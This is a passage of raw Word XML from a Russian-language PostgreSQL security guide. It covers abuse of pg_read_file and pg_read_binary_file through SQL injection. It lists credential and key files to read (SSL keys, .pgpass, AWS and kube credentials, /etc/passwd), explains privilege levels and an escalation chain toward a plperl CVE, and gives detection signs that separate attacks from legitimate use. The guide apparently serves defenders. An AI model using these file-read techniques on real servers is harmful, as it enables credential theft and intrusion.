        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/etc/ssl/private/server.key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/var/lib/postgresql/.postgresql/postgresql.key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — SSL-ключи (Payload C).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6A7293" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>~postgres/.pgpass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пароли к другим PG-инстансам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BA694B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>~postgres/.aws/credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>~postgres/.kube/config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — cross-system credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6615B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path discovery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/proc/self/maps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (адресное пространство postmaster для подготовки memory-corruption эксплойтов), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (список ОС-пользователей для подбора), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/etc/os-release</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (точная дистрибуция и версия для подбора kernel-CVE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195C2BE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000C3022" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file(text path, bigint offset, bigint length)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> под капотом — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OpenTransientFile()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через ОС-API. Никакого sandboxing, никакого chroot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9F3036" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Путь интерпретируется так: если начинается с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;drive&gt;:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на Windows) — абсолютный путь; иначе — относительный от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data_directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> кластера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0979BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   До PG 11 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> был только superuser-функцией, и принимал только относительные пути. PG 11 ввёл predefined role </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t>, которая снимает ограничение на абсолютные пути и убирает требование superuser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428FFAFC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_binary_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — отличается возвращаемым типом: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bytea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Не падает на байтах вне валидного UTF-8 (важно для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/proc/self/environ</w:t>
      </w:r>
      <w:r>
        <w:t>, бинарных файлов, файлов в encoding отличном от server_encoding).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289C7FB9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   UNION-форма работает потому, что обе функции возвращают типы, приводимые к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сам по себе, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bytea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>encode(..., 'base64'|'hex'|'escape')</w:t>
      </w:r>
      <w:r>
        <w:t>). Совмещение с типом исходной колонки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name text</w:t>
      </w:r>
      <w:r>
        <w:t>) — тривиально.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC9E72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Когда HTTP-ответ невидим (например, точка инъекции — error-only) — результат можно вынести через chain с 3.6.1/3.6.2 (см. «Связанные паттерны»).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B744C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Три параллельных уровня доступности — каждый уровень открывает свой набор payload-ов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D60CBD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уровень (1) — любая роль, относительные пути в data_dir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file('PG_VERSION')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file('postgresql.auto.conf')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file('pg_logical/replorigin_checkpoint')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — работает без специальных привилегий. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Под капотом — функция работает как SECURITY DEFINER с проверкой пути:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> относительный путь канонизуется и валидируется на нахождение внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data_directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, попытка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или абсолютного пути на этом уровне приводит к ошибке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>absolute path not allowed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Поэтому уровень (1) ограничен файлами data_dir — но даже там есть полезное: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PG_VERSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postmaster.opts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (флаги запуска), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgresql.auto.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (ALTER SYSTEM настройки).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B379F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уровень (2) — `pg_read_server_files` predefined role + абсолютные пути.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT pg_read_server_files TO appuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> снимает проверку пути — открываются абсолютные пути, чтение любых файлов с правами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t>. Payload B и Payload C требуют этот уровень.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575AC143" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уровень (3) — superuser.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Всё то же плюс возможность делегировать роль (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT pg_read_server_files TO ...</w:t>
      </w:r>
      <w:r>
        <w:t>) другим ролям. Для самой атаки этот уровень избыточен — Payload B/C работают на (2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB4FA96" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Цепочка эскалации: уровень (1) даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PG_VERSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → известна major-версия PG → атакующий понимает, какие CVE из раздела 4 применимы (например, для PG &lt;17.1 можно цеплять CVE-2024-10979 plperl env RCE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFE1EC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Модель привилегий — см. раздел </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (predefined roles).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEF099C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C509FBB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application-роли</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практически всегда атака. Легитимное использование — только из admin-сессий и только для одного use case: чтение собственных логов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_read_file('log/postgresql-2026-05-25.log', ...)</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0C9EBA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в UNION-конструкции — однозначная атака. В легитимном коде функция вызывается отдельным SELECT, не в UNION-ветке поверх произвольной таблицы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B321E96" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Любое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_binary_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от application — атака; для web-приложений у этой функции нет легитимных use cases. Все легитимные применения — административные (резервное копирование SSL-сертификатов, дамп файлов конфигурации).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC323D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_activity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, содержащий одновременно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_binary_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и абсолютный путь начиная с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/etc/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/proc/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/var/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/root/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/home/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атака.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B02E84" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F56E92" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Работает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 14–17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (механика стабильна с PG 11; до PG 11 — только superuser + только относительные пути).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9FB12E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed: `pg_read_server_files` структурно недоступна на всех major-провайдерах.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> На AWS RDS роль зарезервирована за внутренней инфраструктурой и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не выдаётся даже `rds_superuser`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; на Google Cloud SQL — аналогично, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
